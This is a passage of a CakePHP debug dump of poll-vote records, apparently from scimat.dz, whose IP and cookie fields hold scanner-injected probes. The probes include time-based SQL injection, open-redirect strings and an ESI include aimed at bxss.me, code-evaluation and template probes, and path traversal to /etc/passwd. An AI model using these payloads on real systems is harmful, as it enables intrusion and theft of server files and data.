'ip' => '//scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3664 => array(
'id' => '4207',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3665 => array(
'id' => '4208',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3666 => array(
'id' => '4209',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3667 => array(
'id' => '4210',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3668 => array(
'id' => '4211',
'ip' => '//scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3669 => array(
'id' => '4212',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3670 => array(
'id' => '4213',
'ip' => '//bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3671 => array(
'id' => '4214',
'ip' => '45.11.82.145',
'ip1' => '-1 OR 2+306-306-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 3672 => array(
'id' => '4215',
'ip' => '45.11.82.145',
'ip1' => '-1 OR 2+32-32-1=0+0+0+1',
'sondage_id' => '2'
),
(int) 3673 => array(
'id' => '4216',
'ip' => '//bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3674 => array(
'id' => '4217',
'ip' => '45.11.82.145',
'ip1' => '-1' OR 2+685-685-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 3675 => array(
'id' => '4218',
'ip' => '//bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3676 => array(
'id' => '4219',
'ip' => '45.11.82.145',
'ip1' => '-1' OR 2+987-987-1=0+0+0+1 or 'lrtdm5D0'='',
'sondage_id' => '2'
),
(int) 3677 => array(
'id' => '4220',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3678 => array(
'id' => '4221',
'ip' => '45.11.82.145',
'ip1' => '-1" OR 2+410-410-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 3679 => array(
'id' => '4222',
'ip' => 'http:bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3680 => array(
'id' => '4223',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3681 => array(
'id' => '4224',
'ip' => '45.11.82.145',
'ip1' => 'if(now()=sysdate(),sleep(15),0)',
'sondage_id' => '2'
),
(int) 3682 => array(
'id' => '4225',
'ip' => 'http:bxss.me/',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3683 => array(
'id' => '4226',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3684 => array(
'id' => '4227',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2010'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z',
'sondage_id' => '2'
),
(int) 3685 => array(
'id' => '4228',
'ip' => 'http:bxss.me/\',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3686 => array(
'id' => '4229',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3687 => array(
'id' => '4230',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2010"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z',
'sondage_id' => '2'
),
(int) 3688 => array(
'id' => '4231',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3689 => array(
'id' => '4232',
'ip' => '45.11.82.145',
'ip1' => '(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/',
'sondage_id' => '2'
),
(int) 3690 => array(
'id' => '4233',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3691 => array(
'id' => '4234',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201-1 waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 3692 => array(
'id' => '4235',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3693 => array(
'id' => '4236',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3694 => array(
'id' => '4237',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201CAxfxRD8'; waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 3695 => array(
'id' => '4238',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3696 => array(
'id' => '4239',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201zswW7id4' OR 877=(SELECT 877 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 3697 => array(
'id' => '4240',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3698 => array(
'id' => '4241',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3699 => array(
'id' => '4242',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201idN3WTyb') OR 466=(SELECT 466 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 3700 => array(
'id' => '4243',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3701 => array(
'id' => '4244',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201JZcX8ThN')) OR 113=(SELECT 113 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 3702 => array(
'id' => '4245',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3703 => array(
'id' => '4246',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3704 => array(
'id' => '4247',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'',
'sondage_id' => '2'
),
(int) 3705 => array(
'id' => '4248',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3706 => array(
'id' => '4249',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'"',
'sondage_id' => '2'
),
(int) 3707 => array(
'id' => '4250',
'ip' => '45.11.82.145',
'ip1' => '@@MzRWo',
'sondage_id' => '2'
),
(int) 3708 => array(
'id' => '4251',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3709 => array(
'id' => '4252',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3710 => array(
'id' => '4253',
'ip' => 'https:\\bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3711 => array(
'id' => '4254',
'ip' => 'https:\\bxss.me/',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3712 => array(
'id' => '4255',
'ip' => 'https:\\bxss.me/\',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3713 => array(
'id' => '4256',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3714 => array(
'id' => '4257',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3715 => array(
'id' => '4258',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3716 => array(
'id' => '4259',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3717 => array(
'id' => '4260',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3718 => array(
'id' => '4261',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3719 => array(
'id' => '4262',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3720 => array(
'id' => '4263',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3721 => array(
'id' => '4264',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3722 => array(
'id' => '4265',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3723 => array(
'id' => '4266',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3724 => array(
'id' => '4267',
'ip' => '/\bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3725 => array(
'id' => '4268',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3726 => array(
'id' => '4269',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3727 => array(
'id' => '4270',
'ip' => '/\scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3728 => array(
'id' => '4271',
'ip' => '/\scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3729 => array(
'id' => '4272',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3730 => array(
'id' => '4273',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3731 => array(
'id' => '4274',
'ip' => '/\bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3732 => array(
'id' => '4275',
'ip' => '/\bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3733 => array(
'id' => '4276',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3734 => array(
'id' => '4277',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3735 => array(
'id' => '4278',
'ip' => '/\bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3736 => array(
'id' => '4279',
'ip' => '/\/bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3737 => array(
'id' => '4280',
'ip' => '/\/scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3738 => array(
'id' => '4281',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3739 => array(
'id' => '4282',
'ip' => '/\/scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3740 => array(
'id' => '4283',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3741 => array(
'id' => '4284',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3742 => array(
'id' => '4285',
'ip' => '/\/bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3743 => array(
'id' => '4286',
'ip' => '/\/bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3744 => array(
'id' => '4287',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3745 => array(
'id' => '4288',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3746 => array(
'id' => '4289',
'ip' => '\\bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3747 => array(
'id' => '4290',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3748 => array(
'id' => '4291',
'ip' => '\\scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3749 => array(
'id' => '4292',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3750 => array(
'id' => '4293',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3751 => array(
'id' => '4294',
'ip' => '\\scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3752 => array(
'id' => '4295',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3753 => array(
'id' => '4296',
'ip' => '\\bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3754 => array(
'id' => '4297',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3755 => array(
'id' => '4298',
'ip' => '\\bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3756 => array(
'id' => '4299',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3757 => array(
'id' => '4300',
'ip' => '\\bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3758 => array(
'id' => '4301',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3759 => array(
'id' => '4302',
'ip' => '45.11.82.145',
'ip1' => 'https://scimat.dz/',
'sondage_id' => '2'
),
(int) 3760 => array(
'id' => '4303',
'ip' => '45.11.82.145',
'ip1' => 'https://redirtest.acx/',
'sondage_id' => '2'
),
(int) 3761 => array(
'id' => '4304',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3762 => array(
'id' => '4305',
'ip' => '45.11.82.145',
'ip1' => 'scimat.dz',
'sondage_id' => '2'
),
(int) 3763 => array(
'id' => '4306',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3764 => array(
'id' => '4307',
'ip' => '45.11.82.145',
'ip1' => 'redirtest.acx',
'sondage_id' => '2'
),
(int) 3765 => array(
'id' => '4308',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3766 => array(
'id' => '4309',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3767 => array(
'id' => '4310',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3768 => array(
'id' => '4311',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3769 => array(
'id' => '4312',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3770 => array(
'id' => '4313',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3771 => array(
'id' => '4314',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3772 => array(
'id' => '4315',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3773 => array(
'id' => '4316',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3774 => array(
'id' => '4317',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3775 => array(
'id' => '4318',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3776 => array(
'id' => '4319',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3777 => array(
'id' => '4320',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3778 => array(
'id' => '4321',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3779 => array(
'id' => '4322',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3780 => array(
'id' => '4323',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3781 => array(
'id' => '4324',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3782 => array(
'id' => '4325',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3783 => array(
'id' => '4326',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3784 => array(
'id' => '4327',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3785 => array(
'id' => '4328',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3786 => array(
'id' => '4329',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3787 => array(
'id' => '4330',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3788 => array(
'id' => '4331',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3789 => array(
'id' => '4332',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3790 => array(
'id' => '4333',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3791 => array(
'id' => '4334',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3792 => array(
'id' => '4335',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3793 => array(
'id' => '4336',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3794 => array(
'id' => '4337',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3795 => array(
'id' => '4338',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3796 => array(
'id' => '4339',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3797 => array(
'id' => '4340',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3798 => array(
'id' => '4341',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3799 => array(
'id' => '4342',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3800 => array(
'id' => '4343',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3801 => array(
'id' => '4344',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3802 => array(
'id' => '4345',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3803 => array(
'id' => '4346',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3804 => array(
'id' => '4347',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3805 => array(
'id' => '4348',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3806 => array(
'id' => '4349',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3807 => array(
'id' => '4350',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3808 => array(
'id' => '4351',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3809 => array(
'id' => '4352',
'ip' => '45.11.82.145',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3810 => array(
'id' => '4353',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3811 => array(
'id' => '4354',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3812 => array(
'id' => '4355',
'ip' => '45.137.76.29',
'ip1' => 'OpeiVIAd',
'sondage_id' => '2'
),
(int) 3813 => array(
'id' => '4356',
'ip' => '45.137.76.29',
'ip1' => 'xw7RKwY8: gP7ekQdm',
'sondage_id' => '2'
),
(int) 3814 => array(
'id' => '4357',
'ip' => '45.137.76.29',
'ip1' => 'response.write(9389967*9717535)',
'sondage_id' => '2'
),
(int) 3815 => array(
'id' => '4358',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3816 => array(
'id' => '4359',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3817 => array(
'id' => '4360',
'ip' => '45.137.76.29',
'ip1' => ''+response.write(9389967*9717535)+'',
'sondage_id' => '2'
),
(int) 3818 => array(
'id' => '4361',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201<esi:include src="http://bxss.me/rpb.png"/>',
'sondage_id' => '2'
),
(int) 3819 => array(
'id' => '4362',
'ip' => '45.137.76.29',
'ip1' => '"+response.write(9389967*9717535)+"',
'sondage_id' => '2'
),
(int) 3820 => array(
'id' => '4363',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3821 => array(
'id' => '4364',
'ip' => '45.137.76.29',
'ip1' => '',
'sondage_id' => '2'
),
(int) 3822 => array(
'id' => '4365',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3823 => array(
'id' => '4366',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3824 => array(
'id' => '4367',
'ip' => '45.137.76.29',
'ip1' => '${10000028+9999698}',
'sondage_id' => '2'
),
(int) 3825 => array(
'id' => '4368',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3826 => array(
'id' => '4369',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3827 => array(
'id' => '4370',
'ip' => '45.137.76.29',
'ip1' => '../../../../../../../../../../../../../../etc/passwd',
'sondage_id' => '2'
),
(int) 3828 => array(
'id' => '4371',
'ip' => '45.137.76.29',
'ip1' => 'amlBSlkyaTZCczNUY3Y4Vm9zUlRyMTdSNWNIbGE1OGJxWFVmSnRheA==',
'sondage_id' => '2'
),
(int) 3829 => array(
'id' => '4372',
'ip' => '45.137.76.29',
'ip1' => '../../../../../../../../../../../../../../windows/win.ini',
'sondage_id' => '2'
),
(int) 3830 => array(
'id' => '4373',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3831 => array(
'id' => '4374',
'ip' => '45.137.76.29',
'ip1' => 'file:///etc/passwd',
'sondage_id' => '2'
),
(int) 3832 => array(
'id' => '4375',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3833 => array(
'id' => '4376',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201&n967579=v925302',
'sondage_id' => '2'
),
(int) 3834 => array(
'id' => '4377',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3835 => array(
'id' => '4378',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3836 => array(
'id' => '4379',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3837 => array(
'id' => '4380',
'ip' => '45.137.76.29',
'ip1' => '../CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3838 => array(
